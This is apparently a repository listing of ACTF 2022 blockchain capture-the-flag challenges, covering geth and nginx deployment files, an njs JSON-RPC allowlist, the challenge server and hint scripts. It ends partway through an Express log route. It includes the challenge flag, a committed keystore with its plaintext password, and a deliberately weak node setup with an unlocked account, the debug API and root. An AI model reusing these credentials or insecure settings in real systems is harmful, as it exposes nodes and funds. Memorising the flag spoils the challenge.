49 | */ 50 | function unset(BitMap storage bitmap, uint256 index) internal { 51 | uint256 bucket = index >> 8; 52 | uint256 mask = 1 << (index & 0xff); 53 | bitmap._data[bucket] &= ~mask; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | # NOTE(review): `geth` below is a prebuilt binary taken from the build context; this Dockerfile neither builds it from source nor checks a digest, so its provenance has to be verified separately. 3 | COPY entrypoint.sh /entrypoint.sh 4 | COPY geth /geth 5 | RUN chmod +x /entrypoint.sh /geth 6 | # EXPOSE only documents the port; the docker-compose.yml in this directory gives the geth service no `ports:` entry and publishes 8545 from the nginx proxy service instead. 7 | EXPOSE 8545 8 | # NOTE(review): there is no USER instruction, so /entrypoint.sh and the geth process it execs start as root inside the container. 9 | ENTRYPOINT ["/entrypoint.sh"] 10 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 ChainFlag 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/config/genesis.json: -------------------------------------------------------------------------------- 1 | { 2 | "config": { 3 | "chainId": 45267, 4 | "homesteadBlock": 0, 5 | "eip150Block": 0, 6 | "eip150Hash": "0x0000000000000000000000000000000000000000000000000000000000000000", 7 | "eip155Block": 0, 8 | "eip158Block": 0, 9 | "byzantiumBlock": 0, 10 | "constantinopleBlock": 0, 11 | "petersburgBlock": 0, 12 | "istanbulBlock": 0, 13 | "berlinBlock": 0, 14 | "londonBlock": 0, 15 | "clique": { 16 | "period": 5, 17 | "epoch": 30000 18 | } 19 | }, 20 | "nonce": "0x0", 21 | "timestamp": "0x609ac710", 22 | "extraData": "0x0000000000000000000000000000000000000000000000000000000000000000639A0408b8F8997BB80Af7Ef373Df92C851C77420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", 23 | "gasLimit": "0x47b760", 24 | "difficulty": "0x1", 25 | "mixHash": "0x0000000000000000000000000000000000000000000000000000000000000000", 26 | "coinbase": "0x0000000000000000000000000000000000000000", 27 | "alloc": { 28 | "639A0408b8F8997BB80Af7Ef373Df92C851C7742": { 29 | "balance": "0x200000000000000000000000000000000000000000000000000000000000000" 30 | } 31 | }, 32 | "number": "0x0", 33 | "gasUsed": "0x0", 34 | "parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000" 35 | } -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/config/keystore/UTC--2022-06-21T09-05-49.757555100Z--639a0408b8f8997bb80af7ef373df92c851c7742: -------------------------------------------------------------------------------- 1 | 
{"address":"639a0408b8f8997bb80af7ef373df92c851c7742","crypto":{"cipher":"aes-128-ctr","ciphertext":"09b891b6780c499e84c3984c8525acdba9f5348d2500db9f4b22d314bcce4058","cipherparams":{"iv":"64ca0cca4b7c95f37157b094c87237e6"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"6eb8165b002e7b0a3d2b6e02ac62677ed43e7fd9ef1de5e16bbae97dc883daa7"},"mac":"b6ae92b6feeb4f957cb2d2ece911a8a888cd7935dd1346108e3484eca903bed4"},"id":"d50929ac-19a9-4af3-a5aa-801dd7f413ac","version":3} -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/config/password.txt: -------------------------------------------------------------------------------- 1 | 43rt 3489rh389m58r934n7 5r 89weyhf890cwrf@#$@RED@#DRF@#RT@ V#5r cg3 487qxb -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | geth: 4 | build: . 
5 | container_name: ethereum 6 | volumes: 7 | - ./config:/config 8 | - ./data:/data 9 | restart: always 10 | # The geth service above has no `ports:` entry; `proxy` is the only service that maps 8545 to the host. NOTE(review): entrypoint.sh starts geth with the `debug` API enabled and account 0 unlocked, so which JSON-RPC methods can reach the node depends on the njs/nginx.conf rules mounted below (not shown in this part of the listing) - confirm they allow-list methods. 11 | proxy: 12 | image: nginx:1.22-alpine 13 | container_name: rpcproxy 14 | ports: 15 | - "8545:8545" 16 | links: 17 | - geth 18 | volumes: 19 | - ./njs:/etc/nginx/njs 20 | - ./nginx.conf:/etc/nginx/nginx.conf 21 | depends_on: 22 | - geth 23 | restart: always 24 | # Ports in this file are written as "HOST:CONTAINER" with no address part, so Docker binds them on every host interface. 25 | challenge: 26 | build: ./eth-challenge-base 27 | container_name: challenge 28 | ports: 29 | - "20000:20000" 30 | links: 31 | - geth 32 | env_file: 33 | - ./eth-challenge-base/.env 34 | volumes: 35 | - ./eth-challenge-base/contracts:/home/ctf/contracts 36 | - ./eth-challenge-base/challenge.yml:/home/ctf/challenge.yml 37 | depends_on: 38 | - geth 39 | restart: always 40 | # NOTE(review): the faucet signs with the keystore and password.txt under ./config, both of which are committed to this repository, and genesis.json pre-funds that address; treat the key as public and never reuse it outside this challenge network. 41 | faucet: 42 | image: chainflag/eth-faucet:1.1.0 43 | container_name: ethfaucet 44 | environment: 45 | - WEB3_PROVIDER=http://geth:8545 46 | ports: 47 | - "8080:8080" 48 | links: 49 | - geth 50 | volumes: 51 | - ./config/keystore:/app/keystore 52 | - ./config/password.txt:/app/password.txt 53 | command: -wallet.keyjson /app/keystore -wallet.keypass /app/password.txt -faucet.minutes 1 54 | depends_on: 55 | - geth 56 | restart: always 57 | 58 | networks: 59 | default: 60 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | if ! 
[ -d "/data/geth" ]; then 4 | ./geth init "/config/genesis.json" --datadir=/data 5 | cp /config/keystore/* /data/keystore/ 6 | fi 7 | 8 | networkid=45267 9 | 10 | exec ./geth --datadir=/data \ 11 | --allow-insecure-unlock \ 12 | --networkid="$networkid" \ 13 | --nodiscover --mine \ 14 | --password="/config/password.txt" --unlock="0" \ 15 | --http --http.api=debug,eth,net,web3 --http.addr=0.0.0.0 --http.port=8545 --http.corsdomain='*' --http.vhosts='*' 16 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/.dockerignore: -------------------------------------------------------------------------------- 1 | **/__pycache__ 2 | **/*.py[cod] 3 | example/.env 4 | example/docker-compose.yml 5 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/.env: -------------------------------------------------------------------------------- 1 | WEB3_PROVIDER_URI=http://geth:8545 2 | 3 | ## Optional Environment Variables 4 | # TOKEN_SECRET=secret 5 | # set POW_DIFFICULTY to a non zero value to enable Proof of Work 6 | # POW_DIFFICULTY=0 -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-slim-buster 2 | 3 | WORKDIR /home/ctf 4 | 5 | RUN cp -a /etc/apt/sources.list /etc/apt/sources.list.bak \ 6 | && sed -i "s@http://deb.debian.org@https://repo.huaweicloud.com@g" /etc/apt/sources.list \ 7 | && sed -i "s@http://security.debian.org@https://repo.huaweicloud.com@g" /etc/apt/sources.list \ 8 | && apt-get update \ 9 | && apt-get install -y --no-install-recommends build-essential tini xinetd \ 10 | && apt-get clean \ 11 | && rm -rf /var/lib/apt/lists/* 12 | 13 | COPY requirements.txt . 
14 | RUN pip install --trusted-host https://repo.huaweicloud.com -i https://repo.huaweicloud.com/repository/pypi/simple -r requirements.txt 15 | 16 | COPY run.py . 17 | COPY eth_challenge_base eth_challenge_base 18 | 19 | COPY xinetd.sh /xinetd.sh 20 | COPY entrypoint.sh /entrypoint.sh 21 | RUN mkdir /var/log/ctf 22 | RUN chmod +x /entrypoint.sh 23 | 24 | ENTRYPOINT ["tini", "-g", "--"] 25 | CMD ["/entrypoint.sh"] 26 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 ChainFlag 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/Makefile: -------------------------------------------------------------------------------- 1 | lint: 2 | black --check . --diff 3 | flake8 --ignore=E501,W503 --show-source 4 | isort --profile black . --check --diff 5 | 6 | format: 7 | black . 8 | isort --profile black . 9 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/challenge.yml: -------------------------------------------------------------------------------- 1 | contract: Game # Challenge contract name(class name) 2 | 3 | # The description will be displayed when players nc to the challenge 4 | description: | 5 | emm... this EVM looks strange! 6 | Anyway, your goal is still to make isSolved() function returns true! 7 | 8 | flag: ACTF{tH1S_i5_a_h@rd_$0rK_CaL!Ed_A@a_be20049f3607a32f660677281df6febd4e6} 9 | 10 | constructor: 11 | args: [] 12 | value: 0 13 | #gas: 1000000 # The default value is the response value of the eth_estimateGas JSON-RPC 14 | 15 | #show_source: False # Show source option available by default, you need to set False for a reverse contract challenge 16 | 17 | #solved_event: SendFlag # The default is to use isSolved() view function as solved checker, but emitted event checker is also supported 18 | 19 | #deployed_addr: 0xdac17f958d2ee523a2206206994597c13d831ec7 # Use a pre-deployed contract for all players instead of deploying individually 20 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/develop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | 4 | from run import conn_handler 5 | 6 | os.environ["TOKEN_SECRET"] = "secret" 7 | os.environ["WEB3_PROVIDER_URI"] = "http://localhost:8545" 8 | os.system("cd example && brownie 
compile") 9 | 10 | conn_handler("example") 11 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$TOKEN_SECRET" ]; then 4 | TOKEN_SECRET=$(openssl rand -base64 32 | tr -d /=+) 5 | export TOKEN_SECRET 6 | fi 7 | 8 | source /xinetd.sh 9 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/__init__.py: -------------------------------------------------------------------------------- 1 | __version_info__ = (0, 9, 3) 2 | __version__ = ".".join(map(str, __version_info__)) 3 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/config.py: -------------------------------------------------------------------------------- 1 | from dataclasses import dataclass 2 | from typing import Any 3 | 4 | import yaml 5 | 6 | 7 | @dataclass(eq=False, frozen=True) 8 | class Constructor: 9 | args: Any 10 | value: int 11 | gas_limit: int 12 | 13 | 14 | @dataclass(eq=False, frozen=True) 15 | class Config: 16 | contract: str 17 | description: str 18 | flag: str 19 | show_source: bool 20 | solved_event: str 21 | deployed_addr: str 22 | constructor: Constructor 23 | 24 | 25 | def parse_config(path: str) -> Config: 26 | with open(path, "r") as f: 27 | config = yaml.safe_load(f) 28 | 29 | show_source = config.get("show_source", True) 30 | solved_event = config.get("solved_event", "") 31 | deployed_addr = config.get("deployed_addr", "") 32 | constructor = config.get("constructor", {}) 33 | constructor_args = constructor.get("args", ()) 34 | constructor_value = constructor.get("value", 0) 35 | constructor_gas = constructor.get("gas", 0) 36 | 37 | if constructor_value is None or constructor_value < 0: 38 | 
constructor_value = 0 39 | 40 | return Config( 41 | config["contract"], 42 | config["description"], 43 | config["flag"], 44 | show_source, 45 | solved_event, 46 | deployed_addr, 47 | Constructor(constructor_args, constructor_value, constructor_gas), 48 | ) 49 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/utils/__init__.py: -------------------------------------------------------------------------------- 1 | from .eth import Account, Contract, web3 2 | from .pow import Powser 3 | 4 | __all__ = ["Account", "Contract", "web3", "Powser"] 5 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/utils/pow.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import secrets 3 | 4 | 5 | class Powser: 6 | def __init__(self, difficulty: int, prefix_length: int = 8): 7 | self._difficulty = difficulty 8 | self._prefix = ( 9 | secrets.token_urlsafe(prefix_length)[:prefix_length] 10 | .replace("-", "b") 11 | .replace("_", "a") 12 | ) 13 | 14 | def __str__(self): 15 | return f"sha256({ self._prefix } + ???).binary.endswith('{ '0' * self._difficulty }')" 16 | 17 | def verify_hash(self, answer: str) -> bool: 18 | h = hashlib.sha256() 19 | h.update((self._prefix + answer).encode()) 20 | bits = "".join(bin(i)[2:].zfill(8) for i in h.digest()) 21 | return bits.endswith("0" * self._difficulty) 22 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/requirements-dev.in: -------------------------------------------------------------------------------- 1 | black 2 | flake8 3 | isort 4 | pip-tools 5 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/requirements-dev.txt: 
-------------------------------------------------------------------------------- 1 | # 2 | # This file is autogenerated by pip-compile with python 3.9 3 | # To update, run: 4 | # 5 | # pip-compile requirements-dev.in 6 | # 7 | black==22.1.0 8 | # via -r requirements-dev.in 9 | click==8.0.4 10 | # via 11 | # black 12 | # pip-tools 13 | flake8==4.0.1 14 | # via -r requirements-dev.in 15 | isort==5.10.1 16 | # via -r requirements-dev.in 17 | mccabe==0.6.1 18 | # via flake8 19 | mypy-extensions==0.4.3 20 | # via black 21 | pathspec==0.9.0 22 | # via black 23 | pep517==0.12.0 24 | # via pip-tools 25 | pip-tools==6.5.1 26 | # via -r requirements-dev.in 27 | platformdirs==2.5.1 28 | # via black 29 | pycodestyle==2.8.0 30 | # via flake8 31 | pyflakes==2.4.0 32 | # via flake8 33 | tomli==2.0.1 34 | # via black 35 | typing-extensions==4.1.1 36 | # via black 37 | wheel==0.37.1 38 | # via pip-tools 39 | 40 | # The following packages are considered to be unsafe in a requirements file: 41 | # pip 42 | # setuptools 43 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/requirements.in: -------------------------------------------------------------------------------- 1 | hexbytes<1 2 | pyseto>=1.6.0,<2 3 | pyyaml>=5.4.0,<6 4 | rlp<3 5 | web3>=5.27.0,<6 6 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import signal 4 | import sys 5 | 6 | from eth_challenge_base.action import Actions 7 | from eth_challenge_base.config import parse_config 8 | from eth_challenge_base.utils import Powser 9 | 10 | 11 | def conn_handler(project_path: str = "."): 12 | signal.alarm(60) 13 | difficulty = int(os.getenv("POW_DIFFICULTY", "0")) 14 | if difficulty != 0: 15 | pow_challenge = Powser(difficulty) 16 | 
print(f"[+] {pow_challenge}") 17 | if not pow_challenge.verify_hash(input("[-] ??? = ")): 18 | print("[+] wrong proof") 19 | sys.exit(1) 20 | 21 | project_path = os.path.join(os.path.dirname(__file__), project_path) 22 | config = parse_config(os.path.join(project_path, "challenge.yml")) 23 | print(config.description) 24 | actions = Actions(project_path, config) 25 | for i, action in enumerate(actions): 26 | print(f"[{i+1}] - {action.description}") 27 | 28 | choice = None 29 | while choice is None: 30 | try: 31 | choice = int(input("[-] input your choice: ")) - 1 32 | except ValueError: 33 | print("must be an integer") 34 | continue 35 | else: 36 | if choice < 0 or choice >= len(actions): 37 | print("invalid option") 38 | sys.exit(1) 39 | 40 | sys.exit(actions[choice].handler()) 41 | 42 | 43 | if __name__ == "__main__": 44 | conn_handler() 45 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/xinetd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cat < /etc/xinetd.d/ctf 4 | service ctf 5 | { 6 | type = UNLISTED 7 | flags = NODELAY 8 | disable = no 9 | socket_type = stream 10 | protocol = tcp 11 | wait = no 12 | user = root 13 | log_type = FILE /var/log/ctf/xinetd.log 14 | log_on_success = PID HOST EXIT DURATION 15 | log_on_failure = HOST ATTEMPT 16 | port = ${PORT:-20000} 17 | bind = 0.0.0.0 18 | server = /usr/local/bin/python3 19 | server_args = /home/ctf/run.py 20 | per_source = ${PER_SOURCE:-4} 21 | cps = ${CPS_RATE:-200} ${CPS_DELAY:-5} 22 | rlimit_cpu = ${RLIMIT_CPU:-5} 23 | } 24 | EOF 25 | 26 | xinetd -filelog /var/log/ctf/xinetd.log 27 | tail -f /var/log/ctf/* 28 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/nginx.conf: -------------------------------------------------------------------------------- 1 | load_module modules/ngx_http_js_module.so; 2 | 3 | 
events {
4 |     worker_connections 1024;
5 | }
6 |
7 | http {
8 |     js_path "/etc/nginx/njs/";
9 |
10 |     js_import main from eth-jsonrpc-access.js;
11 |
12 |     server {
13 |         listen 8545;
14 |         client_body_buffer_size 128k;
15 |
16 |         if ($request_method !~ ^(POST)$) {
17 |             return 403;
18 |         }
19 |
20 |         location / {
21 |             js_content main.access;
22 |         }
23 |
24 |         location @jsonrpc {
25 |             proxy_pass http://geth:8545;
26 |         }
27 |     }
28 | }
29 |
--------------------------------------------------------------------------------
/blockchain/Weird_EVM/depoly/njs/eth-jsonrpc-access.js:
--------------------------------------------------------------------------------
/**
 * njs content handler for `location /` (wired up in nginx.conf as
 * `js_content main.access`). It is the JSON-RPC method allowlist in front of
 * the geth node: a request is handed to the named location `@jsonrpc`
 * (proxy_pass http://geth:8545) only after every check below has passed.
 *
 * Why the list matters: entrypoint.sh starts geth with
 * `--http.api=debug,eth,net,web3`, and docker-compose.yml publishes port 8545
 * on this proxy only, so this list is what keeps `debug_*` and every other
 * unlisted method away from clients.
 *
 * Responses:
 *   401 - `jsonrpc` is not exactly "2.0", `method` is not in the list, or more
 *         than one key of the body lower-cases to "method";
 *   415 - the body does not parse as JSON, or anything else throws inside the
 *         try block (for example a body of `null`).
 * A JSON array (batch request) has no `jsonrpc` property and is therefore
 * answered with 401 as well.
 *
 * @param r njs HTTP request object.
 */
1 | function access(r) {
2 |     var whitelist = [
3 |         "eth_blockNumber",
4 |         "eth_call",
5 |         "eth_chainId",
6 |         "eth_estimateGas",
7 |         "eth_gasPrice",
8 |         "eth_getBalance",
9 |         "eth_getCode",
10 |         "eth_getStorageAt",
11 |         "eth_getTransactionByHash",
12 |         "eth_getTransactionCount",
13 |         "eth_getTransactionReceipt",
14 |         "eth_sendRawTransaction",
15 |         "net_version",
16 |         "rpc_modules",
17 |         "web3_clientVersion"
18 |     ];
19 |
20 |     try {
        // NOTE(review): njs exposes the request body only while it is held in
        // memory; nginx.conf sets client_body_buffer_size 128k. A larger body
        // presumably arrives here as undefined, fails JSON.parse and is
        // answered with 415 (fails closed) - confirm on the njs version in use.
21 |         var payload = JSON.parse(r.requestBody);
22 |         if (payload.jsonrpc !== "2.0") {
23 |             r.return(401, "jsonrpc version not supported\n");
24 |             return;
25 |         }
        // Exact, case-sensitive match against the list above; a missing or
        // non-string `method` never matches and is rejected.
26 |         if (!whitelist.includes(payload.method)) {
27 |             r.return(401, "jsonrpc method is not allowed\n");
28 |             return;
29 |         }
        // Reject a body that carries more than one key spelling "method" when
        // case is ignored. NOTE(review): presumably this is here because the
        // backend's JSON decoder may match field names case-insensitively and
        // would then read a different key than the one checked above - confirm
        // against geth before relaxing it.
30 |         if (Object.keys(payload).filter(key => key.toLowerCase() === 'method').length > 1) {
31 |             r.return(401, "jsonrpc method is not allowed\n");
32 |             return;
33 |         }
34 |     } catch (error) {
35 |         r.return(415, "Cannot parse payload into JSON\n");
36 |         return;
37 |     }
38 |
    // All checks passed: forward the unchanged request to the geth upstream.
39 |     r.internalRedirect('@jsonrpc');
40 | }
41 |
42 | export default { access }
43 |
--------------------------------------------------------------------------------
/blockchain/Weird_EVM/exploits/build/Game.abi:
--------------------------------------------------------------------------------
1 |
[{"inputs":[],"name":"G2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"H2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"xH2","type":"uint256"},{"components":[{"internalType":"uint256[4]","name":"CG","type":"uint256[4]"},{"internalType":"uint256[4]","name":"CH","type":"uint256[4]"},{"internalType":"uint256[4]","name":"eG","type":"uint256[4]"},{"internalType":"uint256[4]","name":"eH","type":"uint256[4]"},{"internalType":"uint256[4]","name":"a0","type":"uint256[4]"},{"internalType":"uint256[4]","name":"a1","type":"uint256[4]"},{"internalType":"uint256[4]","name":"b0","type":"uint256[4]"},{"internalType":"uint256[4]","name":"b1","type":"uint256[4]"}],"internalType":"struct dleqProof","name":"proof","type":"tuple"}],"name":"check","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hint","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"newChallenge","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"xG2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}] -------------------------------------------------------------------------------- /blockchain/Weird_EVM/exploits/build/Solu.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[{"internalType":"address","name":"addr","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"game","outputs":[{"internalType":"contract 
Game","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"solve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}] -------------------------------------------------------------------------------- /blockchain/Weird_EVM/hints/README.md: -------------------------------------------------------------------------------- 1 | # hints 2 | 3 | There are 3 big binaries in this directory. 4 | 5 | To ease the pressure of the repo, here are the netdisk link: 6 | 7 | https://pan.baidu.com/s/1K7D_h_pCksRYQnVmPqxGyw?pwd=ku74 8 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/hints/opcodeTableGotter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mkdir /testdata 4 | 5 | ./geth --datadir /testdata --vmdebug --nodiscover --dev --verbosity 0 & 6 | 7 | cat > /testdata/run.js <<- EOF 8 | const opcodes = []; 9 | for (let i = 0; i < 256; i++) { 10 | let log = debug.traceCall({ 11 | "to": null, 12 | "data": "0x" + (i<16?'0':'') + i.toString(16) + "000000000000000000000000000000000000000000000000000000000000000000" 13 | }, "latest", {"disableStorage": true, "disableMemory": true}); 14 | let op = log.structLogs[0].op; 15 | if (op.includes('not defined')) continue; 16 | opcodes.push([i, op]); 17 | } 18 | console.log(JSON.stringify(opcodes)); 19 | EOF 20 | 21 | ./geth --verbosity 0 js /testdata/run.js 22 | 23 | #kill -9 `ps aux | grep geth | grep testdata | awk '{print $2}' | head -n 1` 24 | 25 | rm -rf /testdata -------------------------------------------------------------------------------- /blockchain/Weird_EVM/hints/src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/Weird_EVM/hints/src.zip 
-------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node 2 | 3 | WORKDIR /app 4 | 5 | COPY . . 6 | 7 | RUN npm --registry https://registry.npm.taobao.org install 8 | 9 | EXPOSE 3000 10 | 11 | # watch out environment variables 12 | # export IP_ADDR= 13 | # export WEB3_PROVIDER= 14 | # export DATADIR= 15 | # export WINFLAG= 16 | 17 | CMD ["bin/www"] 18 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "app", 3 | "version": "0.0.0", 4 | "private": true, 5 | "scripts": { 6 | "start": "node ./bin/www" 7 | }, 8 | "dependencies": { 9 | "cookie-parser": "~1.4.4", 10 | "debug": "~2.6.9", 11 | "ethereum-keystore": "^0.0.3", 12 | "express": "~4.16.1", 13 | "http-errors": "~1.6.3", 14 | "jade": "~1.11.0", 15 | "morgan": "~1.9.1", 16 | "solc": "^0.8.14-fixed", 17 | "web3": "^1.7.3" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/public/public/mdl/icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/bet2loss/attachments/public/public/mdl/icons.woff2 -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/public/public/mdl/note.txt: -------------------------------------------------------------------------------- 1 | material.indigo-blue.css与原版文件的区别 2 | 删去了.mdl-textfield--expandable .mdl-button--icon{top:16px} 3 | 在开头@charset "UTF-8";后添加@font-face{font-family:'Material Icons';font-style:normal;font-weight:400;src:url(/mdl/icons.woff2) format('woff2')} 4 | 
material.js与原版文件的区别 5 | 在 6 | if (registeredClass.widget) { 7 | // Assign per element instance for control over API 8 | element[registeredClass.className] = instance; 9 | } 10 | 后添加if(element.onUpgraded)element.onUpgraded(instance);(增加的事件) -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/public/stylesheets/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | padding: 50px; 3 | font: 14px "Lucida Grande", Helvetica, Arial, sans-serif; 4 | } 5 | 6 | a { 7 | color: #00B7FF; 8 | } 9 | 10 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/routes/index.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var router = express.Router(); 3 | var path = require('path'); 4 | 5 | /* GET home page. */ 6 | router.get('/', function(req, res, next) { 7 | res.sendFile(path.join(__dirname, '..', 'public', 'index.html')); // new version 8 | // res.render('index', { title: 'bet2loss', provider: "http://" + res.app.locals.providerIP + ":8545", contract: res.app.locals.game_contract }); // old version 9 | }); 10 | 11 | router.get('/config', function(req, res, next) { 12 | res.json({ title: 'bet2loss', provider: "http://" + res.app.locals.providerIP + ":8545", contract: res.app.locals.game_contract }); 13 | }); 14 | 15 | module.exports = router; 16 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/routes/log.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var router = express.Router(); 3 | let fs = require("fs"); 4 | const path = require('path'); 5 | 6 | /* GET home page. 
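*/
/**
 * POST / (log route) - send back the stored log file of one address.
 *
 * Expects `req.body.address` to be a "0x"-prefixed hex string. The value is
 * validated and normalised exactly as routes/sync.js does when it writes the
 * file, and only the normalised form is used to build the file name.
 *
 * Responses: the file as a download; 400 "invalid address" for a missing or
 * malformed address; 404 "invalid address" when no log exists for it.
 */
router.post('/', function (req, res, next) {
  console.log("log", req.body);

  // The address comes from the request body and selects which file is sent
  // back, so it must never reach the file name unvalidated: with the raw
  // value, any "<name>.txt" entry in the data directory could be requested,
  // not just an address log.
  const requested = req.body ? req.body.address : undefined;
  if (typeof requested !== 'string' || !requested.startsWith('0x') || !Number.isFinite(parseInt(requested, 16))) {
    res.status(400).send("invalid address");
    return;
  }

  // NOTE(review): parseInt() returns a double, so a 160-bit address keeps only
  // its leading ~53 bits and distinct addresses can normalise to the same
  // name. Left as is because sync.js names the existing files this way.
  const address = "0x" + parseInt(requested, 16).toString(16);

  const datadir = "/app/data";
  const filename = address + ".txt";
  const filepath = path.join(datadir, filename);

  // Only serve a name that is an actual entry of the data directory.
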